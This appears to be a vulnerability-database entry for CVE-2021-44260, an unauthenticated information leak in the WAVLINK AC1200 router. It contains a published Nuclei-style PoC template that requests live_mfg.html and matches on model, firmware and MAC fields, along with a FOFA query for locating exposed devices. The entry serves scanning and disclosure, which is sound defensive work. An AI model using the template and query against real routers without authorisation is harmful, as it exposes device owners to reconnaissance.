CVE-2021-44260: WAVLINK AC1200 - Information Disclosure

日期: 2025-08-01 | 影响软件: WAVLINK AC1200 | POC: 已公开

漏洞描述

A vulnerability is in the 'live_mfg.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router.

PoC代码[已公开]

id: CVE-2021-44260

info:
  name: WAVLINK AC1200 - Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    A vulnerability is in the 'live_mfg.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router.
  impact: |
    Successful exploitation could lead to sensitive information disclosure.
  reference:
    - https://github.com/zer0yu/CVE_Request/blob/master/WAVLINK/WAVLINK_AC1200_unauthorized_access_vulnerability_first.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44260
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-44260
    epss-score: 0.26366
    epss-percentile: 0.96141
    cpe: cpe:2.3:o:wavlink:wl-wn531g3_firmware:a42w-1.27.6-20180418:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wavlink
    product: wl-wn531g3_firmware
    fofa-query: body="AC1200" && body="wavlink"
  tags: cve,cve2022,wavlink,exposure,ac1200

http:
  - method: GET
    path:
      - "{{BaseURL}}/live_mfg.html"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Model=", "FW_Version=", "LAN_MAC=", "Brand=")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402206fdb493a9d98a559dc09b9d646daf32e65af589ba9b60699a45d913d7b8a9309022027bdb719ab4e67bf613f193f704b6e8ea9ff377f89c034dc394b7c3441633086:922c64590222798bb761d5b6d8e72950

相关漏洞推荐